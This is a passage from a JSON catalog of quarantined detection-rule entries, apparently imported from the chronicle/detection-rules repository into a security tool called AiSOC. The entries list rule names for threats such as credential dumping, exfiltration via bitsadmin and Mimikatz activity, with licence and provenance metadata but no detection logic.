AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "covid19_ransomware_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/covid19_ransomware_detection.yaral" } }, { "id": "chronicle-detection-rules-covid19-themed-malware-via-chm-file", "type": "detection", "name": "covid19_themed_malware_via_chm_file", "description": "covid19_themed_malware_via_chm_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/covid19-themed-malware-via-chm-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "covid19_themed_malware_via_chm_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/covid_19_themed_malware_via_chm_file.yaral" } }, { "id": "chronicle-detection-rules-create-dump-process-dump", "type": "detection", "name": "create_dump_process_dump", "description": "create_dump_process_dump", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/create-dump-process-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "create_dump_process_dump", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/create_dump_process_dump.yaral" } }, { "id": "chronicle-detection-rules-cred-dump-tools-dropped-files", "type": "detection", "name": "cred_dump_tools_dropped_files", "description": "cred_dump_tools_dropped_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cred-dump-tools-dropped-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cred_dump_tools_dropped_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/cred_dump_tools_dropped_files.yaral" } }, { "id": "chronicle-detection-rules-credential-dumping-attempt-via-werfault", "type": "detection", "name": "credential_dumping_attempt_via_werfault", "description": "credential_dumping_attempt_via_werfault", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/credential-dumping-attempt-via-werfault.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "credential_dumping_attempt_via_werfault", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/credential_dumping_attempt_via_werfault.yaral" } }, { "id": "chronicle-detection-rules-crypt32dll-nsa-vulnerability-cve20200601", "type": "detection", "name": "crypt32dll_nsa_vulnerability_cve20200601", "description": "crypt32dll_nsa_vulnerability_cve20200601", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/crypt32dll-nsa-vulnerability-cve20200601.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "crypt32dll_nsa_vulnerability_cve20200601", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/windows/crypt32_dll_nsa_vulnerability__cve_2020_0601.yaral" } }, { "id": "chronicle-detection-rules-crypto-miner-user-agent", "type": "detection", "name": "crypto_miner_user_agent", "description": "crypto_miner_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/crypto-miner-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "crypto_miner_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/crypto_miner_user_agent.yaral" } }, { "id": "chronicle-detection-rules-currentcontrolset-autorun-keys-modification", "type": "detection", "name": "currentcontrolset_autorun_keys_modification", "description": "currentcontrolset_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/currentcontrolset-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "currentcontrolset_autorun_keys_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/currentcontrolset_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-currentversion-autorun-keys-modification", "type": "detection", "name": "currentversion_autorun_keys_modification", "description": "currentversion_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/currentversion-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "currentversion_autorun_keys_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/currentversion_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-cve201813379-fortigate-ssl-vpn-arbitrary-file-reading", "type": "detection", "name": "cve201813379_fortigate_ssl_vpn_arbitrary_file_reading", "description": "cve201813379_fortigate_ssl_vpn_arbitrary_file_reading", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve201813379-fortigate-ssl-vpn-arbitrary-file-reading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve201813379_fortigate_ssl_vpn_arbitrary_file_reading", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/cve_2018_13379_fortigate_ssl_vpn_arbitrary_file_reading.yaral" } }, { "id": "chronicle-detection-rules-cve20200688-exchange-exploitation-via-web-log", "type": "detection", "name": "cve20200688_exchange_exploitation_via_web_log", "description": "cve20200688_exchange_exploitation_via_web_log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve20200688-exchange-exploitation-via-web-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve20200688_exchange_exploitation_via_web_log", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/webserver/cve_2020_0688_exchange_exploitation_via_web_log.yaral" } }, { "id": "chronicle-detection-rules-cve20201350-dns-remote-code-exploit-sigred-via-cmdline", "type": "detection", "name": "cve20201350_dns_remote_code_exploit_sigred_via_cmdline", "description": "cve20201350_dns_remote_code_exploit_sigred_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve20201350-dns-remote-code-exploit-sigred-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve20201350_dns_remote_code_exploit_sigred_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/process_creation/cve_2020_1350_dns_remote_code_exploit__sigred___via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-cve20201350-sigred-windows-dns-dos-exploit-nslookup-cli", "type": "detection", "name": "cve20201350_sigred__windows_dns_dos_exploit_nslookup_cli", "description": "cve20201350_sigred__windows_dns_dos_exploit_nslookup_cli", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/cve20201350-sigred-windows-dns-dos-exploit-nslookup-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "cve20201350_sigred__windows_dns_dos_exploit_nslookup_cli", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/cve_2020_1350__sigred____windows_dns_dos_exploit__nslookup_cli.yaral" } }, { "id": "chronicle-detection-rules-danabot-trojan-sysmon", "type": "detection", "name": "danabot_trojan_sysmon", "description": "danabot_trojan_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/danabot-trojan-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "danabot_trojan_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/danabot_trojan__sysmon.yaral" } }, { "id": "chronicle-detection-rules-darkgate-cryptocurrency-mining-and-ransomware-campaign-sysmon", "type": "detection", "name": "darkgate_cryptocurrency_mining_and_ransomware_campaign_sysmon", "description": "darkgate_cryptocurrency_mining_and_ransomware_campaign_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/darkgate-cryptocurrency-mining-and-ransomware-campaign-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "darkgate_cryptocurrency_mining_and_ransomware_campaign_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/darkgate_cryptocurrency_mining_and_ransomware_campaign__sysmon.yaral" } }, { "id": "chronicle-detection-rules-data-compression-detector-sysmon-behavior", "type": "detection", "name": "data_compression_detector_sysmon_behavior", "description": "data_compression_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/data-compression-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_compression_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/data_compression_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-data-exfiltration-attempt-via-bitsadmin", "type": "detection", "name": "data_exfiltration_attempt_via_bitsadmin", "description": "data_exfiltration_attempt_via_bitsadmin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/data-exfiltration-attempt-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_exfiltration_attempt_via_bitsadmin", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/data_exfiltration_attempt_via_bitsadmin.yaral" } }, { "id": "chronicle-detection-rules-data-exfiltration-detection-with-htran", "type": "detection", "name": "data_exfiltration_detection_with_htran", "description": "data_exfiltration_detection_with_htran", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/data-exfiltration-detection-with-htran.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_exfiltration_detection_with_htran", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/data_exfiltration_detection_with_htran.yaral" } }, { "id": "chronicle-detection-rules-data-seondbin-ransomware-detector-sysmon-behavior", "type": "detection", "name": "data_seondbin_ransomware_detector_sysmon_behavior", "description": "data_seondbin_ransomware_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/data-seondbin-ransomware-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "data_seondbin_ransomware_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/1data_seond_bin_ransomware_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-default-powersploit-and-empire-schtasks-persistence", "type": "detection", "name": "default_powersploit_and_empire_schtasks_persistence", "description": "default_powersploit_and_empire_schtasks_persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/default-powersploit-and-empire-schtasks-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "default_powersploit_and_empire_schtasks_persistence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/default_powersploit_and_empire_schtasks_persistence.yaral" } }, { "id": "chronicle-detection-rules-default-powersploit-schtasks-persistence", "type": "detection", "name": "default_powersploit_schtasks_persistence", "description": "default_powersploit_schtasks_persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/default-powersploit-schtasks-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "default_powersploit_schtasks_persistence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/default_powersploit_schtasks_persistence.yaral" } }, { "id": "chronicle-detection-rules-default-rdp-port-changed-to-non-standard-port", "type": "detection", "name": "default_rdp_port_changed_to_non_standard_port", "description": "default_rdp_port_changed_to_non_standard_port", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/default-rdp-port-changed-to-non-standard-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "default_rdp_port_changed_to_non_standard_port", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/default_rdp_port_changed_to_non_standard_port.yaral" } }, { "id": "chronicle-detection-rules-detect-cmdexe-obfuscation", "type": "detection", "name": "detect_cmdexe_obfuscation", "description": "detect_cmdexe_obfuscation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-cmdexe-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_cmdexe_obfuscation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_cmd_exe_obfuscation.yaral" } }, { "id": "chronicle-detection-rules-detect-crackmapexec-mimikatz-module-footprint-on-a-victim-machine", "type": "detection", "name": "detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine", "description": "detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-crackmapexec-mimikatz-module-footprint-on-a-victim-machine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/detect_crackmapexec_mimikatz_module_footprint_on_a_victim_machine.yaral" } }, { "id": "chronicle-detection-rules-detect-enumeration-via-wmi", "type": "detection", "name": "detect_enumeration_via_wmi", "description": "detect_enumeration_via_wmi", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-enumeration-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_enumeration_via_wmi", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_enumeration_via_wmi.yaral" } }, { "id": "chronicle-detection-rules-detect-hawkeye-keylogger-on-your-windows-endpoints", "type": "detection", "name": "detect_hawkeye_keylogger_on_your_windows_endpoints", "description": "detect_hawkeye_keylogger_on_your_windows_endpoints", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-hawkeye-keylogger-on-your-windows-endpoints.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_hawkeye_keylogger_on_your_windows_endpoints", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_hawkeye_keylogger_on_your_windows_endpoints.yaral" } }, { "id": "chronicle-detection-rules-detect-possible-discovery-and-collection-of-files", "type": "detection", "name": "detect_possible_discovery_and_collection_of_files", "description": "detect_possible_discovery_and_collection_of_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-possible-discovery-and-collection-of-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_possible_discovery_and_collection_of_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_possible_discovery_and_collection_of_files.yaral" } }, { "id": "chronicle-detection-rules-detect-possible-execution-of-phishing-attachment", "type": "detection", "name": "detect_possible_execution_of_phishing_attachment", "description": "detect_possible_execution_of_phishing_attachment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-possible-execution-of-phishing-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_possible_execution_of_phishing_attachment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_possible_execution_of_phishing_attachment.yaral" } }, { "id": "chronicle-detection-rules-detect-possible-pony-malware", "type": "detection", "name": "detect_possible_pony_malware", "description": "detect_possible_pony_malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-possible-pony-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_possible_pony_malware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/detect_possible_pony_malware.yaral" } }, { "id": "chronicle-detection-rules-detect-rogue-servicesexe-process", "type": "detection", "name": "detect_rogue_servicesexe_process", "description": "detect_rogue_servicesexe_process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-rogue-servicesexe-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_rogue_servicesexe_process", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_rogue_services_exe_process.yaral" } }, { "id": "chronicle-detection-rules-detect-search-for-credentials-on-windows-operating-system", "type": "detection", "name": "detect_search_for_credentials_on_windows_operating_system", "description": "detect_search_for_credentials_on_windows_operating_system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-search-for-credentials-on-windows-operating-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_search_for_credentials_on_windows_operating_system", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_search_for_credentials_on_windows_operating_system.yaral" } }, { "id": "chronicle-detection-rules-detect-service-creation-by-metasploit-on-victim-machine", "type": "detection", "name": "detect_service_creation_by_metasploit_on_victim_machine", "description": "detect_service_creation_by_metasploit_on_victim_machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-service-creation-by-metasploit-on-victim-machine.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_service_creation_by_metasploit_on_victim_machine", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_service_creation_by_metasploit_on_victim_machine.yaral" } }, { "id": "chronicle-detection-rules-detect-when-a-process-tries-to-allow-execution-of-malicious-email-attachments", "type": "detection", "name": "detect_when_a_process_tries_to_allow_execution_of_malicious_email_attachments", "description": "detect_when_a_process_tries_to_allow_execution_of_malicious_email_attachments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 